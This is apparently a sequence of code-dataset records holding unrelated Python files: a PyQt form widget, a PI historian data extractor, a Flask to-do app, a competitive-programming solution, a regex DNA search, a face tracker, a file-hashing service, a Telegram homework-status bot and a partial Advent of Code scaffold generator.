getattr(meta, idx)\n type_ = 'normal'\n if idx in self.model.file_field:\n type_ = 'file'\n if idx in self.model.combo_field:\n type_ = 'combo'\n if idx in self.model.date_field:\n type_ = 'date'\n if idx == 'sex':\n type_ = \"sex\"\n read_only = True if idx in self.model.read_field else False\n data_list.append({\n 'idx': idx,\n 'comment': comment,\n 'value': value,\n 'type': type_,\n 'readonly': read_only\n })\n if meta.pic:\n filtered_data['photo'] = meta.photo\n self.refresh_table(data_list, **filtered_data)\n return True\n\n def refresh_table(self, data_list, **kwargs):\n table_widget = self.ui.tableWidget\n pic_height = self.pic_item_height if self.need_pic else 0\n row_count = (len(data_list) - pic_height + 1) // 2 + pic_height\n column_count = 4\n table_widget.clearContents()\n table_widget.setRowCount(row_count)\n table_widget.setColumnCount(column_count)\n print(1)\n # pic-item\n if self.need_pic:\n table_widget.setSpan(0, 2, pic_height, 1)\n table_widget.setSpan(0, 3, pic_height, 1)\n print(2)\n item = QTableWidgetItem()\n item.setFlags(Qt.ItemIsEnabled)\n item.setText(\"照片\")\n table_widget.setItem(0, 2, item)\n pic_widget = PicWidget()\n pic_widget.set_picture(kwargs.get('photo'))\n table_widget.setCellWidget(0, 3, pic_widget)\n # data-list-set\n for i, item in enumerate(data_list[:pic_height]):\n self.generate_item(item, i, 0)\n for i, item in enumerate(data_list[pic_height:]):\n row = pic_height + i // 2\n col = 0 if i % 2 == 0 else 2\n self.generate_item(item, row, col)\n # 奇数时不可编辑\n if (len(data_list) - pic_height) % 2 == 1:\n item = QTableWidgetItem()\n item.setFlags(Qt.NoItemFlags)\n table_widget.setItem(row_count - 1, 2, item)\n item = QTableWidgetItem()\n item.setFlags(Qt.NoItemFlags)\n table_widget.setItem(row_count - 1, 3, item)\n table_widget.resizeColumnsToContents()\n table_widget.resizeRowsToContents()\n\n def generate_item(self, item, row, col):\n table_widget = self.ui.tableWidget\n comment_item = QTableWidgetItem()\n comment_item.setText(item['comment'])\n comment_item.setFlags(Qt.ItemIsEnabled)\n table_widget.setItem(row, col, comment_item)\n widget = None\n if item['type'] == 'normal':\n widget = NormalWidget(item['value'])\n widget.textChanged.connect(table_widget.resizeRowsToContents)\n elif item['type'] == 'file':\n description = \"{model}-{id}-{comment}\".format(\n model=self.model.class_name,\n id=self.data_id,\n comment=item['comment']\n )\n widget = FileWidget(description)\n widget.set_file_path(item['value'])\n elif item['type'] == 'sex':\n widget = SexWidget()\n widget.set_sex(item['value'])\n elif item['type'] == 'combo':\n widget = CheckComboWidget()\n widget.exclude = self.model.combo_field[item['idx']]['exclude']\n widget.set_items(self.model.combo_field[item['idx']]['items'])\n widget.selected_items = item['value']\n widget.setFont(widget.font())\n elif item['type'] == 'date':\n widget = DateWidget()\n widget.set_date(item['value'])\n if widget:\n if item['readonly']:\n widget.setEnabled(False)\n table_widget.setCellWidget(row, col + 1, widget)\n\n def get_data_from_table(self) -> dict:\n table_widget = self.ui.tableWidget\n pic_height = self.pic_item_height if self.need_pic else 0\n row_cnt = table_widget.rowCount()\n data = dict()\n if self.need_pic:\n pic_widget = table_widget.cellWidget(0, 3)\n data['photo'] = pic_widget.get_data()\n for row in range(0, row_cnt):\n cols = [0] if row < pic_height else [0, 2]\n for col in cols:\n item = table_widget.item(row, col)\n if item is None or item.text() == '':\n continue\n text = item.text()\n field 
= self.translator.to_field(text)\n widget = table_widget.cellWidget(row, col + 1)\n content = widget.get_data()\n data[field] = content\n for field, val in self.default_conditions.items():\n if field in data:\n continue\n data[field] = val\n return data\n\n def show_(self, enable: bool, data):\n self.ui.tableWidget.setEnabled(enable)\n id_ = data['id']\n self.data_id = id_\n if self.model.export_docx:\n self.ui.btn_export.show()\n else:\n self.ui.btn_export.hide()\n if self.refresh_data(id_):\n self.exec_()\n else:\n self.close()\n\n def paintEvent(self, e):\n if self.data_id == -1:\n self.ui.btn_append.show()\n self.ui.btn_modify.hide()\n self.ui.btn_delete.hide()\n self.ui.btn_export.hide()\n else:\n self.ui.btn_append.hide()\n self.ui.btn_export.show()\n self.ui.btn_modify.show()\n self.ui.btn_delete.show()\n if g.current_user.permission != UserPermission.Admin:\n self.ui.btn_append.hide()\n self.ui.btn_modify.hide()\n self.ui.btn_delete.hide()\n","repo_name":"ArcherLuo233/election-s-prediction","sub_path":"ui/page_elements/detail_page/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38382919767","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nThis function uses PIConnect (https://pypi.org/project/PIconnect/) to extract \r\n'calculated' or 'sampled' data from a tag or a CSV file of tags within a OSI \r\nPI Historian database into a pandas DataFrame.\r\n\r\nTo use this function, you need to install PIConnect: pip install PIconnect\r\n\r\nINPUTS:\r\n 1. 'Start Date' E.g., 8/21/2020 7:30:00 [MM/DD/YYY HH:MM:SS]\r\n 2. 'End Date' E.g., 8/21/2021 7:30:00 [MM/DD/YYY HH:MM:SS]\r\n 3. 'Time Interval' E.g., 60s (one minute), 10m (ten minutes), 1h (one hour), \r\n 1d (one day), 1m (one month), etc.\r\n 4. 'PI Tag' or 'csv file of PI tags' (e.g., 'P1-FIC-11-024/PV.CV'). A\r\n sample csv files is provided.\r\n 5. 'Variable Name' Often times, the PI tags are meaningless so you could\r\n use 'P1-Flow' for an example. The csv file uses the second column for\r\n the variable name.\r\n 6. 'Data Type' This can be either 'summary' (default) or 'sampled'.\r\n -Summary works only with numeric data and can be used with 'Summary \r\n Type' below.\r\n -Sampled works with either numerical or non-numerical data. This \r\n just grabs the data point at the time/interval selected.\r\n 7. 
'Summary Type' is the type of calculation done for 'Summary' data type.\r\n This can be selected from the following:\r\n -average (default)\r\n -maximum\r\n -minimum\r\n -total (i.e.,summation)\r\n -standard deviation (std_dev)\r\n -range\r\n -count\r\n -mean\r\n\r\nOUTPUTS:\r\n Pandas DataFrame:\r\n Index: Time interval [datetime64]\r\n Header: Variable name(s)\r\n Columns: 'summary' data float64\r\n 'sampled' data float64 or string depending on PI tag\r\n \r\nExample 1:\r\n In this example, we will extract 10-minute hourly average data for a flow \r\n meter during the calendar year of 2019.\r\n PI_Call_Tag(1/1/2019, 1/1/2020, 10m, 'P1-FIC/PV.CV', 'P1-Flow')\r\n\r\nExample 2:\r\n In this example we will calculate maximum monthly peak demand.\r\n PI_Call_Tag(1/1/2019, 1/1/2020, 10m, 'P1-FIC-11-024/PV.CV', 'P1-kW-Max', summaryType='maximum')\r\n \r\n The function outputs a dataframe with the variable renamed 'P1-kW-Max'.\r\n \r\nExample 3: \r\n Let's extract data from a power meter with the PI tag: P1-KW-11-024/PV.CV\r\n We want data range between 1/1/2019 to 1/1/2020\r\n We want the the maximum data over a 1 month time interval\r\n The function would be:\r\n PI_Call_Tag(1/1/2019, 1/1/2020, 10m, 'P1-FIC-11-024/PV.CV', 'P1-kW-Max', summaryType='maximum')\r\n \r\n The function outputs a dataframe with the variable renamed 'P1-kW-Max'.\r\n\r\nTO DO:\r\n-Add functionality to use multiple different summary types within a csv file\r\n\r\n@Author: Nicholas Zibin\r\n@Date: August 10, 2020\r\n@License: MIT\r\n\r\n\"\"\"\r\n\r\n\r\nimport PIconnect as PI\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom csv import reader\r\nfrom PIconnect.PIConsts import SummaryType\r\n\r\ndef PI_Call(start, end, interval, csvFile, dataType='summary', summaryType='average'):\r\n '''Extract 'calculated' or 'sampled' data from a tag or a CSV file of tags \r\n within a OSI PI Historian database into a pandas DataFrame.\r\n \r\n Args:\r\n start (str): Start date. E.g., 8/21/2020 7:30:00 [MM/DD/YYY HH:MM:SS]\r\n end (str): End date. E.g., 8/21/2021 7:30:00 [MM/DD/YYY HH:MM:SS]\r\n interval: (str): Time interval. 
E.g., 60s (one minute), 10m (ten \r\n            minutes), 1h (one hour), 1d (one day), 1m (one month), etc.\r\n        csvFile (str): CSV file containing column of PI tags and one column\r\n            and your variable name of choice for each tag.\r\n        dataType (str): Either 'summary' (default), or 'sampled'\r\n        summaryType (str): Summary type calculation:\r\n            -average (default)\r\n            -maximum\r\n            -minimum\r\n            -total (i.e.,summation)\r\n            -standard deviation (std_dev)\r\n            -range\r\n            -count\r\n            -mean\r\n    \r\n    Returns:\r\n        Pandas DataFrame:\r\n            Index: Time interval [datetime64]\r\n            Header: Variable name(s)\r\n            Columns: 'summary' data float64\r\n                     'sampled' data float64 or string depending on PI tag \r\n    \r\n    '''\r\n    \r\n    #Import the data in csv file with the format of: PI tag, variable name\r\n    # For example, the variable name could be 'Flow'\r\n    with open(csvFile, 'r') as read_obj:\r\n        csv_reader = reader(read_obj)\r\n        query, var_names = zip(*csv_reader)\r\n        query = list(query)\r\n        var_names = list(var_names)\r\n\r\n    #Load the data from PI\r\n    with PI.PIServer() as server:\r\n        points = server.search(query)\r\n        data = []\r\n        for point in points:\r\n            if dataType == 'sampled':\r\n                tmp = point.interpolated_values(start, end, interval)\r\n            elif dataType == 'summary':\r\n                if summaryType == 'average':\r\n                    tmp = point.summaries(start, end, interval, SummaryType.AVERAGE) \r\n                elif summaryType == 'maximum':\r\n                    tmp = point.summaries(start, end, interval, SummaryType.MAXIMUM)\r\n                elif summaryType == 'minimum':\r\n                    tmp = point.summaries(start, end, interval, SummaryType.MINIMUM)\r\n                elif summaryType == 'total':\r\n                    tmp = point.summaries(start, end, interval, SummaryType.TOTAL)\r\n                elif summaryType == 'range':\r\n                    tmp = point.summaries(start, end, interval, SummaryType.RANGE) \r\n                elif summaryType == 'count':\r\n                    tmp = point.summaries(start, end, interval, SummaryType.COUNT)\r\n                elif summaryType == 'std_dev':\r\n                    tmp = point.summaries(start, end, interval, SummaryType.STD_DEV) \r\n                else: \r\n                    print('ERROR: Summary type not valid.')\r\n                    return\r\n                tmp = tmp.rename(columns={'AVERAGE': point.tag}) \r\n            else:\r\n                print('ERROR: Data type not valid.')\r\n                return\r\n            # append for both 'sampled' and 'summary' data, not only 'summary'\r\n            data.append(tmp)\r\n        data = pd.concat(data, axis=1) \r\n        data = data.tz_convert('Canada/Pacific').tz_localize(None) #Have to convert to timezone\r\n    if dataType == 'sampled':\r\n        data = data.replace({'RUNNING': 1, 'STOPPED': 0, 'FAIL': 0})\r\n        data = data.drop(data.tail(1).index)\r\n        data = data.apply(pd.to_numeric, errors='coerce') #converts any errors to NaN\r\n        data = data.replace('[-11059] No Good Data For Calculation', np.nan)\r\n    data.columns = var_names\r\n\r\n    return data\r\n\r\ndef PI_Call_Tag(start, end, interval, query, var_name, dataType='summary', summaryType='average'):\r\n    \r\n    with PI.PIServer() as server:\r\n        point = server.search(query)[0]\r\n        data = []\r\n        if dataType == 'sampled':\r\n            data = point.interpolated_values(start, end, interval)\r\n        elif dataType == 'summary': \r\n            if summaryType == 'average':\r\n                data = point.summaries(start, end, interval, SummaryType.AVERAGE) \r\n            elif summaryType == 'maximum':\r\n                data = point.summaries(start, end, interval, SummaryType.MAXIMUM)\r\n            elif summaryType == 'minimum':\r\n                data = point.summaries(start, end, interval, SummaryType.MINIMUM)\r\n            elif summaryType == 'total':\r\n                data = point.summaries(start, end, interval, SummaryType.TOTAL)\r\n            elif summaryType == 'range':\r\n                
data = point.summaries(start, end, interval, SummaryType.RANGE) \r\n elif summaryType == 'count':\r\n data = point.summaries(start, end, interval, SummaryType.COUNT)\r\n elif summaryType == 'std_dev':\r\n data = point.summaries(start, end, interval, SummaryType.STD_DEV) \r\n else: \r\n print('ERROR: Summary type not valid.')\r\n return\r\n data = data.rename(columns={'AVERAGE': var_name}) \r\n data = data.tz_convert('Canada/Pacific').tz_localize(None) #Have to convert to timezone\r\n else:\r\n print('ERROR: Data type not valid.')\r\n return\r\n if dataType == 'sampled':\r\n data = pd.DataFrame(data)\r\n data = data.tz_convert('Canada/Pacific').tz_localize(None)\r\n data = data.replace({'RUNNING': 1, 'STOPPED': 0, 'FAIL': 0})\r\n data = data.rename(columns = {query: var_name})\r\n data = data.drop(data.tail(1).index)\r\n data = data.apply(pd.to_numeric, errors='coerce') #converts any errors to NaN\r\n data = data.replace('[-11059] No Good Data For Calculation', np.nan)\r\n #data.columns[0] = var_name\r\n\r\n return data\r\n\r\n\r\ndf = PI_Call_Tag('2022-08-01 00:00:00', '2022-09-01 00:00:00', '5m', 'SSPP-P-200/RUN.CV', 'P200_ON', dataType='sampled')\r\n\r\n#Test below\r\n#t20 = PI_Call('8/21/2020 7:30:00', '8/21/2020 11:47:00', '60s', 'Cape_Horn_tags.csv')\r\n#t20_sampled = PI_Call('8/21/2020 7:30:00', '8/21/2020 11:47:00', '60s', 'Cape_Horn_sampled_tags.csv', dataType='sampled')\r\n#t20 = pd.concat([t20, t20_sampled], axis=1)\r\n#print(t20.V226[140]) \r\n \r\n#t20 = PI_Call_Tag('8/21/2020 7:30:00', '8/21/2020 11:47:00', '60s', 'WWHL-LI-051/VOLUME/PV.CV', 'CH_Vol', dataType='summary', summaryType='average')","repo_name":"nicholaszibin/PI-Data-Extract","sub_path":"PI_Data.py","file_name":"PI_Data.py","file_ext":"py","file_size_in_byte":10010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31078865055","text":"from flask import Flask, render_template, request, redirect, url_for\r\nimport sqlite3\r\n\r\napp = Flask(__name__)\r\n\r\n# Set up the database\r\nconn = sqlite3.connect(\"tasks.db\")\r\nc = conn.cursor()\r\nc.execute(\"CREATE TABLE IF NOT EXISTS tasks (id INTEGER PRIMARY KEY AUTOINCREMENT, task TEXT, completed INTEGER)\")\r\nconn.commit()\r\n\r\n# Define a function to get the tasks from the database\r\ndef get_tasks():\r\n c.execute(\"SELECT * FROM tasks\")\r\n tasks = []\r\n for row in c.fetchall():\r\n tasks.append({\"id\": row[0], \"task\": row[1], \"completed\": bool(row[2])})\r\n return tasks\r\n\r\n# Define a function to add a task to the database\r\ndef add_task(task):\r\n c.execute(\"INSERT INTO tasks (task, completed) VALUES (?, ?)\", (task, 0))\r\n conn.commit()\r\n\r\n# Define a function to update a task in the database\r\ndef update_task(task_id, task):\r\n c.execute(\"UPDATE tasks SET task = ? WHERE id = ?\", (task, task_id))\r\n conn.commit()\r\n\r\n# Define a function to delete a task from the database\r\ndef delete_task(task_id):\r\n c.execute(\"DELETE FROM tasks WHERE id = ?\", (task_id,))\r\n conn.commit()\r\n\r\n# Define a function to mark a task as completed in the database\r\ndef complete_task(task_id):\r\n c.execute(\"UPDATE tasks SET completed = ? 
WHERE id = ?\", (1, task_id))\r\n conn.commit()\r\n\r\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\r\ndef index():\r\n if request.method == \"POST\":\r\n if \"add\" in request.form:\r\n task = request.form[\"task\"]\r\n add_task(task)\r\n elif \"edit\" in request.form:\r\n task_id = request.form[\"id\"]\r\n task = request.form[\"task\"]\r\n update_task(task_id, task)\r\n elif \"delete\" in request.form:\r\n task_id = request.form[\"id\"]\r\n delete_task(task_id)\r\n elif \"complete\" in request.form:\r\n task_id = request.form[\"id\"]\r\n complete_task(task_id)\r\n return redirect(url_for(\"index\"))\r\n else:\r\n tasks = get_tasks()\r\n return render_template(\"index.html\", tasks=tasks)\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n","repo_name":"MindOSteph/ToDoListManager","sub_path":"To Do List Manager/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34017558180","text":"from itertools import product, combinations\nimport math\nimport random\nimport sys\nimport collections\nfrom pathlib import Path\nimport bisect\nimport math\n\nimport numpy as np\n\nrandom.seed(42)\n\nif Path(__file__).stem == \"Main\":\n DEBUG_OUT = False\nelse:\n DEBUG_OUT = False\n DEBUG_OUT = True\n\n\ndef q_061_top():\n if DEBUG_OUT:\n q_061(\n 6,\n [[1, 2],\n [1, 1],\n [2, 3],\n [3, 1],\n [3, 2],\n [3, 3],]\n )\n q_061(\n 6,\n [[2, 1],\n [3, 1],\n [2, 2],\n [3, 1],\n [2, 3],\n [3, 1],]\n )\n q_061(\n 6,\n [[1, 1000000000],\n [2, 200000000],\n [1, 30000000],\n [2, 4000000],\n [1, 500000],\n [3, 3], ]\n )\n else:\n q_061()\n\n\ndef q_061(q=None, tx_list=None):\n if not DEBUG_OUT:\n q = list(map(int, input().split()))[0]\n t_list = []\n x_list = []\n for _ in range(q):\n t, x = list(map(int, input().split()))\n t_list.append(t)\n x_list.append(x)\n else:\n print()\n t_list = []\n x_list = []\n for t, x in tx_list:\n t_list.append(t)\n x_list.append(x)\n\n yama = np.empty((q*2,), dtype=int) # indexが若い方が上(index=0が一番上)\n si = q - 1\n ei = q\n for t, x in zip(t_list, x_list):\n if t==1:\n yama[si] = x\n si -= 1\n elif t==2:\n yama[ei] = x\n ei += 1\n elif t==3:\n print(yama[si + x, ])\n \n #yama = []\n #for t, x in zip(t_list, x_list):\n # if t==1:\n # yama = [x] + yama\n # elif t==2:\n # yama.append(x)\n # elif t==3:\n # print(yama[x - 1])\n\n\nif __name__ == \"__main__\":\n q_061_top()\n","repo_name":"zinziroge/atcoder","sub_path":"src/typical90/typical90_061.py","file_name":"typical90_061.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21144087197","text":"import re\n\nclass Regex_solution_ADN():\n @classmethod\n def __init__(self,seq,pattern):\n self.sequence = seq\n self.pattern = pattern\n\n def find_pattern_regex(seq, pat):\n from re import search\n mo = search(pat, seq)\n if (mo != None):\n return mo.span()[0]\n else :\n return -1\n\n def find_all_occurrences_re(seq, pat):\n from re import finditer\n mos = finditer(pat, seq)\n res = []\n for x in mos:\n res.append(x.span()[0])\n return res\n\ndef test():\n seq = input(\"Input sequence:\")\n pat = input(\"Input pattern (as a regular expression):\")\n new = Regex_solution_ADN(seq,pat)\n\n res = new.find_all_occurrences_re(seq, pat)\n if res >= 0:\n print(\"Pattern found in position: \", res)\n else :\n print(\"Pattern not found\")\n\n all_res = new.find_all_occurrences_re(seq, pat)\n if len(all_res) > 0:\n 
print(\"Pattern found in positions: \", all_res)\n else:\n print(\"Pattern not found\")\ntest()\n","repo_name":"DzungLaif/Bio2","sub_path":"Pattern_In_Sequence/Solution3_RGX_DNA.py","file_name":"Solution3_RGX_DNA.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6602490489","text":"import numpy\n\nfrom scipy.interpolate import interp1d\n\nclass FaceTracker:\n def __init__(self, num_failed_det, min_track, min_face_size) -> None:\n self.num_failed_det = num_failed_det\n self.min_track = min_track\n self.min_face_size = min_face_size\n \n\n \n # CPU: Face tracking \n def track_shot_face_tracker(self, faces) -> list:\n iouThres = 0.3 # Minimum IOU between consecutive face detections\n tracks = []\n while True:\n track = []\n for frameFaces in faces:\n for face in frameFaces:\n if track == []:\n track.append(face)\n frameFaces.remove(face)\n elif face['frame'] - track[-1]['frame'] <= self.num_failed_det:\n iou = self._FaceTracker__bb_intersection_over_union(face['bbox'], track[-1]['bbox'])\n if iou > iouThres:\n track.append(face)\n frameFaces.remove(face)\n continue\n else:\n break\n if track == []:\n break\n elif len(track) > self.min_track:\n frameNum = numpy.array([ f['frame'] for f in track ])\n bboxes = numpy.array([numpy.array(f['bbox']) for f in track])\n frameI = numpy.arange(frameNum[0],frameNum[-1]+1)\n bboxesI = []\n for ij in range(0,4):\n interpfn = interp1d(frameNum, bboxes[:,ij])\n bboxesI.append(interpfn(frameI))\n bboxesI = numpy.stack(bboxesI, axis=1)\n if max(numpy.mean(bboxesI[:,2]-bboxesI[:,0]), numpy.mean(bboxesI[:,3]-bboxesI[:,1])) > self.min_face_size:\n tracks.append({'frame':frameI,'bbox':bboxesI})\n return tracks\n \n def __bb_intersection_over_union(self, boxA, boxB, evalCol = False) -> float:\n # CPU: IOU Function to calculate overlap between two image\n xA = max(boxA[0], boxB[0])\n yA = max(boxA[1], boxB[1])\n xB = min(boxA[2], boxB[2])\n yB = min(boxA[3], boxB[3])\n interArea = max(0, xB - xA) * max(0, yB - yA)\n boxAArea = (boxA[2] - boxA[0]) * (boxA[3] - boxA[1])\n boxBArea = (boxB[2] - boxB[0]) * (boxB[3] - boxB[1])\n if evalCol == True:\n iou = interArea / float(boxAArea)\n else:\n iou = interArea / float(boxAArea + boxBArea - interArea)\n return iou","repo_name":"Zeulni/wellbeing-audio-analysis","sub_path":"src/audio/av_speaker_diarization/face_tracking.py","file_name":"face_tracking.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"13747907982","text":"from src.api.repositories.code_repository import CodeRepository\nfrom src.api.utils.constants import LOCALPATH\n\nimport os\nimport hashlib\n\n\nclass CodeServices:\n def __init__(self):\n self.repository = CodeRepository()\n\n @staticmethod\n def save_file_locally(uid, eid, code_from_user):\n os.makedirs(r\"/\".join([LOCALPATH[\"codes\"], str(uid), str(eid)]), exist_ok=True)\n\n inc = 0\n filepath = r\"/\".join([LOCALPATH[\"codes\"], str(uid), str(eid), str(inc) + \".py\"])\n while os.path.isfile(filepath):\n inc += 1\n filepath = r\"/\".join([LOCALPATH[\"codes\"], str(uid), str(eid), str(inc) + \".py\"])\n\n code_from_user.save(filepath)\n\n return filepath, CodeServices.__hashfile(filepath)\n\n @staticmethod\n def __hashfile(filepath):\n # A arbitrary (but fixed) buffer\n BUF_SIZE = 65536\n\n # Initializing the sha256() method\n sha256 = hashlib.sha256()\n\n with open(filepath, 'rb') as f:\n while 
True:\n data = f.read(BUF_SIZE)\n if not data:\n break\n\n sha256.update(data)\n condensat = sha256.hexdigest()\n\n return condensat\n","repo_name":"kevinbdx35/api_restfull","sub_path":"src/api/services/code_services.py","file_name":"code_services.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69814950546","text":"import logging\nimport os\nimport sys\nimport time\n\nimport requests\nimport telegram\nfrom dotenv import load_dotenv\n\nfrom exceptions import (ApiNotAllow, DataError, NoneHwName, StatusCodeError,\n StrangeStatus, TokenError)\n\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s, %(levelname)s, %(message)s'\n )\n\nload_dotenv()\n\nPRACTICUM_TOKEN = os.getenv('prac_token')\nTELEGRAM_TOKEN = os.getenv('token')\nTELEGRAM_CHAT_ID = os.getenv('chat_id')\n\nRETRY_PERIOD = 600\nENDPOINT = 'https://practicum.yandex.ru/api/user_api/homework_statuses/'\nHEADERS = {'Authorization': f'OAuth {PRACTICUM_TOKEN}'}\n\nHOMEWORK_VERDICTS = {\n 'approved': 'Работа проверена: ревьюеру всё понравилось. Ура!',\n 'reviewing': 'Работа взята на проверку ревьюером.',\n 'rejected': 'Работа проверена: у ревьюера есть замечания.'\n}\n\n\ndef check_error_list(bot: telegram.Bot, error: Exception) -> None:\n \"\"\"\n Проверяет тип ошибки и наличие сообщения о ней в глобальном списке ошибок.\n При отсутсвии сообщения о такой ошибки добавляет ее в список.\n Отправляет сообщение об ошибки в чат бота, если ошибки не было в списке.\n Логирует все типы ошибок.\n \"\"\"\n #Типы ошибок, о которых следует единажды отправлять сообщение в чат бота.\n global ERROR_LIST\n e_types_for_chat = (DataError, NoneHwName, TypeError, StrangeStatus)\n if type(error) in e_types_for_chat and str(error) not in ERROR_LIST:\n ERROR_LIST.append(str(error))\n send_message(bot, str(error))\n logging.error(f'Сбой в работе программы: {error}')\n\n\ndef check_tokens() -> None:\n \"\"\"Проверяет доступность переменных окружения.\"\"\"\n vars = (PRACTICUM_TOKEN, TELEGRAM_TOKEN, TELEGRAM_CHAT_ID)\n if not all(vars):\n logging.critical('Токены отсутствуют или имеют не верный тип')\n raise TokenError()\n\n\ndef send_message(bot: telegram.Bot, message: str) -> None:\n \"\"\"Отправляет сообщение в Telegram чат.\"\"\"\n try:\n bot.send_message(chat_id=TELEGRAM_CHAT_ID, text=message)\n logging.debug('Сообщение успешно отправлено в чат')\n except telegram.error.TelegramError as e:\n logging.error(f'Ошибка отправки сообщения {e}')\n\n\ndef get_api_answer(timestamp: int) -> dict:\n \"\"\"Делает запрос к эндпоинту API-сервиса.\"\"\"\n try:\n response = requests.get(\n ENDPOINT, headers=HEADERS,\n params={'from_date': timestamp}\n )\n except Exception as e:\n logging.error(f'Ошибка запроса к API {e}')\n raise ApiNotAllow()\n else:\n if response.status_code != 200:\n logging.error(f'Статус-код ответа: {response.status_code}')\n raise StatusCodeError()\n return response.json()\n\n\ndef check_response(response: dict) -> None:\n \"\"\"Проверяет ответ API на соответствие документации.\"\"\"\n expected_key: str = 'homeworks'\n if type(response) != dict:\n raise TypeError('Неверный тип данных в ответе на запрос')\n if expected_key not in response:\n raise DataError('В ответе API нет нужных данных')\n if type(response['homeworks']) != list:\n raise TypeError('Неверный тип данных по ключу \"homeworks\"')\n\n\ndef parse_status(homework: dict) -> str:\n \"\"\"Извлекает из информации о домашней работе статус этой работы.\"\"\"\n homework_name: 
str = homework.get('homework_name')\n    if not homework_name:\n        raise NoneHwName('Нет названия домашней работы')\n    status: str = homework.get('status')\n    verdict: str = HOMEWORK_VERDICTS.get(status)\n    if not verdict:\n        raise StrangeStatus('Получен нестандартный статус домашней работы')\n    return f'Изменился статус проверки работы \"{homework_name}\". {verdict}'\n\n\ndef main() -> None:\n    \"\"\"\n    Делает запрос к API домашних работ.\n    При наличии обновлений или ошибок отправляет сообщение о событии в чат.\n    \"\"\"\n    current_hw_status = {}\n    check_tokens()\n    bot = telegram.Bot(token=TELEGRAM_TOKEN)\n    timestamp = int(time.time())\n\n    while True:\n        new_updates = 0\n        try:\n            response = get_api_answer(timestamp)\n            check_response(response)\n            homeworks = response.get('homeworks')\n            for hw in homeworks:\n                hw_id: int = hw.get('id')\n                cur_message: str = current_hw_status.setdefault(hw_id, '')\n                resp_message: str = parse_status(hw)\n                if resp_message != cur_message:\n                    current_hw_status[hw_id] = resp_message\n                    send_message(bot, resp_message)\n                    new_updates += 1\n        except Exception as e:\n            check_error_list(bot, e)\n        finally:\n            if not new_updates:\n                logging.debug('Нет новых обновлений')\n            time.sleep(RETRY_PERIOD)\n\n\nif __name__ == '__main__':\n    ERROR_LIST = []\n\n    logger = logging.getLogger(__name__)\n    handler = logging.StreamHandler(sys.stdout)\n    logger.addHandler(handler)\n    try:\n        main()\n    except KeyboardInterrupt:\n        logging.info('Принудительная остановка бота')\n","repo_name":"ddr533/homework_bot","sub_path":"homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":6003,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"73839969107","text":"'''21 Вариант Скляров Владимир. Группа: ИС-23.'''\n\n'''\n    Дан целочисленный список размера N. 
Если он является перестановкой, то есть\n    содержит все числа от 1 до N, то вывести 0; в противном случае вывести номер\n    первого недопустимого элемента.'''\n\ntry:\n    number = int(input(\"Введите число: \"))\n    list_1 = []\n    for i in range(1, number+1):\n        list_1.append(i)\n    n = [i for i in range(1, number+1)]\n    if list_1 == n:\n        print(0)\n    else:\n        m = 0\n        print(list_1)\n        print(n)\n        for i in list_1:\n            if m == len(n):\n                m = m - 1\n            if i != n[m]:\n                print(f\"Первый недопустимый элемент: {m}\")\n            m += 1\n\nexcept ValueError:\n    print(\"Ошибка\")\n","repo_name":"Foo0s/Proj_1sem_Sklyarov","sub_path":"PZ_6/PZ_6_2.py","file_name":"PZ_6_2.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72186455505","text":"#!/usr/bin/env python3\n\nimport os\nimport pathlib\nimport sys\n\nYEAR_NAMES = {\n    2015: \"twentyfifteen\",\n    2016: \"twentysixteen\",\n    2017: \"twentyseventeen\",\n    2018: \"twentyeighteen\",\n    2019: \"twentynineteen\",\n    2020: \"twentytwenty\",\n    2021: \"twentytwentyone\",\n}\n\nDAY_NAME = {\n    1: \"one\",\n    2: \"two\",\n    3: \"three\",\n    4: \"four\",\n    5: \"five\",\n    6: \"six\",\n    7: \"seven\",\n    8: \"eight\",\n    9: \"nine\",\n    10: \"ten\",\n    11: \"eleven\",\n    12: \"twelve\",\n    13: \"thirteen\",\n    14: \"fourteen\",\n    15: \"fifteen\",\n    16: \"sixteen\",\n    17: \"seventeen\",\n    18: \"eighteen\",\n    19: \"nineteen\",\n    20: \"twenty\",\n    21: \"twenty_one\",\n    22: \"twenty_two\",\n    23: \"twenty_three\",\n    24: \"twenty_four\",\n    25: \"twenty_five\",\n}\n\n\ndef make_directories(year: int):\n    input_dir = f\"./input/{year}/\"\n    prog_dir = f\"./{YEAR_NAMES[year]}/\"\n    pathlib.Path.mkdir(pathlib.Path(input_dir), exist_ok=True)\n    pathlib.Path.mkdir(pathlib.Path(prog_dir), exist_ok=True)\n\n\ndef get_filename_with_ext(day: int, ext: str) -> str:\n    dayname = DAY_NAME[day]\n    dayname = dayname.replace(\"_\", \"\")\n    return f\"day_{dayname}.{ext}\"\n\n\ndef gen_input_file(year: int, day: int):\n    filename = get_filename_with_ext(day, \"txt\")\n    filepath = f\"./input/{year}/{filename}\"\n    with open(filepath, mode=\"a\"):\n        pass\n\n\ndef get_function_template(day: int, side: bool) -> str:\n    dayname = DAY_NAME[day].title().replace(\"_\", \"\")\n    if side:\n        s = \"A\"\n    else:\n        s = \"B\"\n    return \"\\n\".join(\n   